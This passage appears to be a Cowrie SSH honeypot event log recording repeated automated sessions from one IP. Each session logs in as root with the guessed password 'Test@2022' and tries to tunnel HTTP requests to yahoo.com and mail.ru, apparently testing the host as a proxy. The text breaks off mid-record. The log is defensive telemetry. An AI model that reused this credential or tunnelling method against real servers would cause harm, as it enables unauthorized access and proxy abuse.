{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.856984Z","src_ip":"77.83.207.83","session":"08e431e4e6fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":12815,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12815","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.001306Z","session":"08e431e4e6fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.052458Z","src_ip":"77.83.207.83","session":"08e431e4e6fd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.104207Z","src_ip":"77.83.207.83","session":"08e431e4e6fd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17821,"dst_ip":"1.2.3.4","dst_port":22,"session":"faddb72e469e","protocol":"ssh","message":"New connection: 77.83.207.83:17821 (1.2.3.4:22) [session: faddb72e469e]","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.153074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.162562Z","src_ip":"77.83.207.83","session":"faddb72e469e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.202961Z","src_ip":"77.83.207.83","session":"faddb72e469e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.451883Z","src_ip":"77.83.207.83","session":"faddb72e469e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11014,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11014","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.502601Z","session":"faddb72e469e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.552576Z","src_ip":"77.83.207.83","session":"faddb72e469e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":8618,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8618","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.692337Z","session":"faddb72e469e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.742304Z","src_ip":"77.83.207.83","session":"faddb72e469e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":3911,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3911","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.884239Z","session":"faddb72e469e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.934001Z","src_ip":"77.83.207.83","session":"faddb72e469e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:40.984632Z","src_ip":"77.83.207.83","session":"faddb72e469e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17900,"dst_ip":"1.2.3.4","dst_port":22,"session":"f32893723b15","protocol":"ssh","message":"New connection: 77.83.207.83:17900 (1.2.3.4:22) [session: f32893723b15]","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.034462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.044665Z","src_ip":"77.83.207.83","session":"f32893723b15"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.085152Z","src_ip":"77.83.207.83","session":"f32893723b15"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.336014Z","src_ip":"77.83.207.83","session":"f32893723b15"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31496,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31496","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.387671Z","session":"f32893723b15"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.438288Z","src_ip":"77.83.207.83","session":"f32893723b15"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":9354,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9354","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.580600Z","session":"f32893723b15"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.630846Z","src_ip":"77.83.207.83","session":"f32893723b15"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":24572,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24572","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.772604Z","session":"f32893723b15"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.822887Z","src_ip":"77.83.207.83","session":"f32893723b15"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.874362Z","src_ip":"77.83.207.83","session":"f32893723b15"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18022,"dst_ip":"1.2.3.4","dst_port":22,"session":"57b9f8b17ec1","protocol":"ssh","message":"New connection: 77.83.207.83:18022 (1.2.3.4:22) [session: 57b9f8b17ec1]","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.923561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.924221Z","src_ip":"77.83.207.83","session":"57b9f8b17ec1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:41.975303Z","src_ip":"77.83.207.83","session":"57b9f8b17ec1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.225143Z","src_ip":"77.83.207.83","session":"57b9f8b17ec1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6238,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6238","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.276425Z","session":"57b9f8b17ec1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.326786Z","src_ip":"77.83.207.83","session":"57b9f8b17ec1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":20634,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:20634","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.468475Z","session":"57b9f8b17ec1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.518527Z","src_ip":"77.83.207.83","session":"57b9f8b17ec1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":656,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:656","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.660417Z","session":"57b9f8b17ec1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.710711Z","src_ip":"77.83.207.83","session":"57b9f8b17ec1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.761883Z","src_ip":"77.83.207.83","session":"57b9f8b17ec1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18142,"dst_ip":"1.2.3.4","dst_port":22,"session":"b99012a6b7cf","protocol":"ssh","message":"New connection: 77.83.207.83:18142 (1.2.3.4:22) [session: b99012a6b7cf]","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.811104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.812866Z","src_ip":"77.83.207.83","session":"b99012a6b7cf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:42.863074Z","src_ip":"77.83.207.83","session":"b99012a6b7cf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.112659Z","src_ip":"77.83.207.83","session":"b99012a6b7cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29513,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:29513","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.163750Z","session":"b99012a6b7cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37782,"dst_ip":"1.2.3.4","dst_port":22,"session":"687623d528c5","protocol":"ssh","message":"New connection: 212.227.235.229:37782 (1.2.3.4:22) [session: 687623d528c5]","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.177574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.178817Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.214082Z","src_ip":"77.83.207.83","session":"b99012a6b7cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":3559,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3559","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.356968Z","session":"b99012a6b7cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.407091Z","src_ip":"77.83.207.83","session":"b99012a6b7cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":8985,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8985","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.549136Z","session":"b99012a6b7cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.599517Z","src_ip":"77.83.207.83","session":"b99012a6b7cf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.650808Z","src_ip":"77.83.207.83","session":"b99012a6b7cf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18274,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d7a9c5584a9","protocol":"ssh","message":"New connection: 77.83.207.83:18274 (1.2.3.4:22) [session: 7d7a9c5584a9]","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.700959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:43.701931Z","src_ip":"77.83.207.83","session":"7d7a9c5584a9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","h